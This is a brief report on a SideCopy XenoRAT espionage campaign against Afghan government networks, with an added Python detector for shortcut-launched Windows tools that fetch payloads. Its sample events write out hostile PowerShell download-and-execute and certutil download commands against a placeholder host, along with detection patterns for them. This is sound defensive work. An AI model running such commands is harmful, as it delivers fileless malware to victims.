Security researchers identified a cyber espionage campaign involving a SideCopy XenoRAT malware attack targeting Afghan government networks. The campaign employs spear-phishing emails with localized Pashto filenames to deliver a malicious shortcut. This triggers a fileless attack, utilizing legitimate Windows tools to fetch further malicious payloads. The malware operates silently by staging its activities in memory, complicating detection.
It also delivers a realistic decoy document to distract victims while the installation occurs. The operation highlights the need for enhanced defenses against sophisticated cyber threats, especially those with geopolitical motives.
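The delivery chain described above (a user-opened shortcut that launches a legitimate Windows tool to pull a payload into memory) leaves a detectable trace in process-creation telemetry even when nothing touches disk. The following is an added detection example and not code from the original report; the report does not name the Windows tools involved, so the list of download-capable built-ins, the parent-process heuristic, and the sample events are constructed assumptions for illustration.

```python
"""Flag shortcut-to-built-in download chains in process-creation events.

Added example (not from the original report). It scores each event on three
heuristics that together match the described chain:
  1. a download-capable Windows built-in launched directly by explorer.exe,
     which is the parent when a user double-clicks a shortcut;
  2. a built-in tool given a remote URL on its command line;
  3. PowerShell run with hidden-window, encoded, or in-memory execution switches.
The tool list and the sample events are constructed assumptions.
"""
import re
from dataclasses import dataclass

# Assumption: common Windows built-ins that can fetch remote content.
DOWNLOAD_CAPABLE = {
    "powershell.exe", "mshta.exe", "certutil.exe",
    "bitsadmin.exe", "curl.exe", "rundll32.exe",
}
# Assumption: processes that act as the parent of a user-launched shortcut.
SHORTCUT_PARENTS = {"explorer.exe"}
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
PS_INMEM_RE = re.compile(
    r"-(w|window|windowstyle)\s+hidden|-enc\b|-e\b|downloadstring|"
    r"\biex\b|invoke-expression",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_suspicious(ev: ProcEvent) -> list[str]:
    """Return the list of matched heuristics (empty means benign)."""
    reasons = []
    img = basename(ev.image)
    if img in DOWNLOAD_CAPABLE and basename(ev.parent_image) in SHORTCUT_PARENTS:
        reasons.append("download-capable built-in launched from a shortcut parent")
    if img in DOWNLOAD_CAPABLE and URL_RE.search(ev.command_line):
        reasons.append("built-in tool invoked with a remote URL on the command line")
    if img == "powershell.exe" and PS_INMEM_RE.search(ev.command_line):
        reasons.append("powershell with hidden-window, encoded, or in-memory switches")
    return reasons


def detect(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map index of each flagged event to the heuristics it matched."""
    return {i: r for i, ev in enumerate(events) if (r := is_suspicious(ev))}


# Constructed sample telemetry; example.invalid is a reserved, non-routable name.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -nop -c iex (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/stage')"),
    # The decoy document being opened looks like any ordinary document launch.
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r'WINWORD.EXE "C:\Users\user\Desktop\notice.docx"'),
    ProcEvent(r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs -p"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\certutil.exe",
              "certutil.exe -urlcache -f http://example.invalid/x x.dat"),
]

if __name__ == "__main__":
    for idx, reasons in detect(SAMPLE_EVENTS).items():
        print(f"event {idx}: {SAMPLE_EVENTS[idx].command_line}")
        for r in reasons:
            print(f"    - {r}")
```

Heuristic 1 is the one most specific to this chain: a normal shortcut opens a document or application, so a download-capable built-in spawned directly by explorer.exe deserves a look even without a visible URL. Run against real telemetry, the tool list and parent set should be tuned to the environment, and matches on the decoy document open (event 1 above) are expected to stay clean.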